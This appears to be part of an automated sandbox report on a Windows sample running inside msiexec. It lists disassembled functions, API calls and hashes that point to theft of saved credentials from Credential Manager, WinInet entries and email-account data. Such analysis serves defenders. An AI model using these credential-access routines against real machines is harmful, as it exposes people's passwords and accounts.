                                                                                                        • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
                                                                                                        • GetWindowPlacement.USER32(?,?), ref: 0040C50C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                                                        • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                                                                        • API String ID: 1012775001-1343505058
                                                                                                        • Opcode ID: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                                                                        • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                                                                                        • Opcode Fuzzy Hash: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                                                                        • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                                                                                        Function 004445ED Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 202stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 00444612
                                                                                                          • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                                        • strlen.MSVCRT ref: 0044462E
                                                                                                        • memset.MSVCRT ref: 00444668
                                                                                                        • memset.MSVCRT ref: 0044467C
                                                                                                        • memset.MSVCRT ref: 00444690
                                                                                                        • memset.MSVCRT ref: 004446B6
                                                                                                          • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                          • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                          • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                                          • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                          • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                                        • memcpy.MSVCRT(?,00000000,00000008,?,?,?,00000000,000003FF,?,00000000,0000041E,?,00000000,0000041E,?,00000000), ref: 004446ED
                                                                                                          • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                          • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                          • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                                        • memcpy.MSVCRT(?,?,00000010,?,?), ref: 00444729
                                                                                                        • memcpy.MSVCRT(?,?,00000008,?,?,00000010,?,?), ref: 0044473B
                                                                                                        • _mbscpy.MSVCRT(?,?), ref: 00444812
                                                                                                        • memcpy.MSVCRT(?,?,00000004,?,?,?,?), ref: 00444843
                                                                                                        • memcpy.MSVCRT(?,?,00000004,?,?,00000004,?,?,?,?), ref: 00444855
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpymemset$strlen$_mbscpy
                                                                                                        • String ID: salu
                                                                                                        • API String ID: 3691931180-4177317985
                                                                                                        • Opcode ID: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                                                                                        • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                                                                                                        • Opcode Fuzzy Hash: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                                                                                        • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                                                                                                        Function 00410034 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$Library$FreeLoad
                                                                                                        • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                                        • API String ID: 2449869053-232097475
                                                                                                        • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                                        • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                                                                                        • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                                        • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                                                                                        Function 0040955A Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 86windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • sprintf.MSVCRT ref: 0040957B
                                                                                                        • LoadMenuA.USER32(?,?), ref: 00409589
                                                                                                          • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                                                                                          • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                                                                                          • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                                                                                          • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                                                                                        • DestroyMenu.USER32(00000000), ref: 004095A7
                                                                                                        • sprintf.MSVCRT ref: 004095EB
                                                                                                        • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                                                                                        • memset.MSVCRT ref: 0040961C
                                                                                                        • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                                                                                        • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                                                                                        • DestroyWindow.USER32(00000000), ref: 0040965C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                                                        • String ID: caption$dialog_%d$menu_%d
                                                                                                        • API String ID: 3259144588-3822380221
                                                                                                        • Opcode ID: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                                                                                        • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                                                                                                        • Opcode Fuzzy Hash: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                                                                                        • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                                                                                                        Function 004045DB Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 41libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                                                                                        • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                        • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                        • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                        • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                        • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                        • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$Library$FreeLoad
                                                                                                        • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                                        • API String ID: 2449869053-4258758744
                                                                                                        • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                                        • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                                                                                                        • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                                        • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                                                                                                        Function 00404235 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 100stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • wcsstr.MSVCRT ref: 0040426A
                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                                                                        • _mbscpy.MSVCRT(?,?), ref: 004042D5
                                                                                                        • _mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
                                                                                                        • strchr.MSVCRT ref: 004042F6
                                                                                                        • strlen.MSVCRT ref: 0040430A
                                                                                                        • sprintf.MSVCRT ref: 0040432B
                                                                                                        • strchr.MSVCRT ref: 0040433C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                                                                        • String ID: %s@gmail.com$www.google.com
                                                                                                        • API String ID: 3866421160-4070641962
                                                                                                        • Opcode ID: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                                                                        • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                                                                                        • Opcode Fuzzy Hash: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                                                                        • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                                                                                        Function 00409731 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 69COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _mbscpy.MSVCRT(0045A448,?), ref: 00409749
                                                                                                        • _mbscpy.MSVCRT(0045A550,general,0045A448,?), ref: 00409759
                                                                                                          • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
                                                                                                          • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,?,00001000,0045A448), ref: 00409355
                                                                                                          • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
                                                                                                        • EnumResourceNamesA.KERNEL32(?,00000004,Function_0000955A,00000000), ref: 0040978F
                                                                                                        • EnumResourceNamesA.KERNEL32(?,00000005,Function_0000955A,00000000), ref: 00409799
                                                                                                        • _mbscpy.MSVCRT(0045A550,strings), ref: 004097A1
                                                                                                        • memset.MSVCRT ref: 004097BD
                                                                                                        • LoadStringA.USER32(?,00000000,?,00001000), ref: 004097D1
                                                                                                          • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                                                                        • String ID: TranslatorName$TranslatorURL$general$strings
                                                                                                        • API String ID: 1035899707-3647959541
                                                                                                        • Opcode ID: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                                                                                                        • Instruction ID: 9d87356d66cebc64c7ffc1a8588b7925a858c7ffbf95e02bf5fcf8d8eff5f455
                                                                                                        • Opcode Fuzzy Hash: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                                                                                                        • Instruction Fuzzy Hash: F711C87290016475F7312B569C46F9B3F5CDBCAB55F10007BBB08A71C3D6B89D408AAD
                                                                                                        Function 0040E381 Relevance: 18.1, APIs: 8, Strings: 4, Instructions: 129COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                                                                        • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                                        • API String ID: 2360744853-2229823034
                                                                                                        • Opcode ID: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                                                                        • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                                                                                        • Opcode Fuzzy Hash: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                                                                        • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                                                                                        Function 004100CC Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • strchr.MSVCRT ref: 004100E4
                                                                                                        • _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                          • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                                          • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                                          • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                                        • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
                                                                                                        • _mbscat.MSVCRT ref: 0041014D
                                                                                                        • memset.MSVCRT ref: 00410129
                                                                                                          • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                                                                          • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
                                                                                                        • memset.MSVCRT ref: 00410171
                                                                                                        • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
                                                                                                        • _mbscat.MSVCRT ref: 00410197
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                                        • String ID: \systemroot
                                                                                                        • API String ID: 912701516-1821301763
                                                                                                        • Opcode ID: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                                                                        • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                                                                                        • Opcode Fuzzy Hash: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                                                                        • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                                                                                        Function 004108E5 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 64COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                                        • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410916
                                                                                                        • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                                        • memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                                        • CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                                                                        Strings
                                                                                                        • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410911
                                                                                                        • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
                                                                                                        • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0041091E
                                                                                                        • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                                        • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                                                                                        • API String ID: 1640410171-2022683286
                                                                                                        • Opcode ID: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                                                                                        • Instruction ID: 9e6d0ab6f4d779539f8eb1da53a4fb6c135c1230b89e6f6df403d509513a9b08
                                                                                                        • Opcode Fuzzy Hash: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                                                                                        • Instruction Fuzzy Hash: AD1151B391011DAAEF11EEA5DC80EEB37ACAB45350F040027F951E3251E6B4D9458BA5
                                                                                                        Function 004196A1 Relevance: 15.3, APIs: 6, Strings: 4, Instructions: 321COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00412F93: strlen.MSVCRT ref: 00412FA1
                                                                                                        • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041983C
                                                                                                        • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041985B
                                                                                                        • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041986D
                                                                                                        • memcpy.MSVCRT(?,-journal,0000000A,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 00419885
                                                                                                        • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 004198A2
                                                                                                        • memcpy.MSVCRT(?,-wal,00000005,?,?,?,?,?,?,?,?,?,00000000,00000000,004067AF), ref: 004198BA
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy$strlen
                                                                                                        • String ID: -journal$-wal$immutable$nolock
                                                                                                        • API String ID: 2619041689-3408036318
                                                                                                        • Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                                        • Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
                                                                                                        • Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                                        • Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98
                                                                                                        Function 004086E0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 155COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                          • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                          • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                          • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                          • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                          • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                        • wcslen.MSVCRT ref: 0040874A
                                                                                                        • wcsncmp.MSVCRT ref: 00408794
                                                                                                        • memset.MSVCRT ref: 0040882A
                                                                                                        • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 00408849
                                                                                                        • wcschr.MSVCRT ref: 0040889F
                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$FreeLibraryLoadLocalmemcpymemsetwcschrwcslenwcsncmp
                                                                                                        • String ID: J$Microsoft_WinInet
                                                                                                        • API String ID: 3318079752-260894208
                                                                                                        • Opcode ID: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                                                                                        • Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
                                                                                                        • Opcode Fuzzy Hash: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                                                                                        • Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A
                                                                                                        Function 004037CA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 86stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 004037EB
                                                                                                        • memset.MSVCRT ref: 004037FF
                                                                                                          • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                                                                          • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                          • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                        • strchr.MSVCRT ref: 0040386E
                                                                                                        • _mbscpy.MSVCRT(?,?,?,?,?), ref: 0040388B
                                                                                                        • strlen.MSVCRT ref: 00403897
                                                                                                        • sprintf.MSVCRT ref: 004038B7
                                                                                                        • _mbscpy.MSVCRT(?,?,?,?,?), ref: 004038CD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset$_mbscpystrlen$memcpysprintfstrchr
                                                                                                        • String ID: %s@yahoo.com
                                                                                                        • API String ID: 2240714685-3288273942
                                                                                                        • Opcode ID: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                                                                        • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                                                                                                        • Opcode Fuzzy Hash: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                                                                        • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59
                                                                                                        Function 0040966C Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                                        • _mbscpy.MSVCRT(0045A448,00000000,?,00000000,0040972B,00000000,?,00000000,00000104), ref: 00409686
                                                                                                        • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,?,00000000,0040972B,00000000,?,00000000,00000104), ref: 00409696
                                                                                                        • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                                                                                          • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                                                                        • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                        • API String ID: 888011440-2039793938
                                                                                                        • Opcode ID: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                                                                                        • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                                                                                                        • Opcode Fuzzy Hash: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                                                                                        • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                                                                                                        Function 0042E8E8 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 272COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        • database %s is already in use, xrefs: 0042E9CE
                                                                                                        • unable to open database: %s, xrefs: 0042EBD6
                                                                                                        • database is already attached, xrefs: 0042EA97
                                                                                                        • too many attached databases - max %d, xrefs: 0042E951
                                                                                                        • cannot ATTACH database within transaction, xrefs: 0042E966
                                                                                                        • out of memory, xrefs: 0042EBEF
                                                                                                        • attached databases must use the same text encoding as main database, xrefs: 0042EAE6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpymemset
                                                                                                        • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                        • API String ID: 1297977491-2001300268
                                                                                                        • Opcode ID: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                                                                        • Instruction ID: 706ac67067754653a22c48b2dfc2d31ecc94a00d4abf430cd75191e688397775
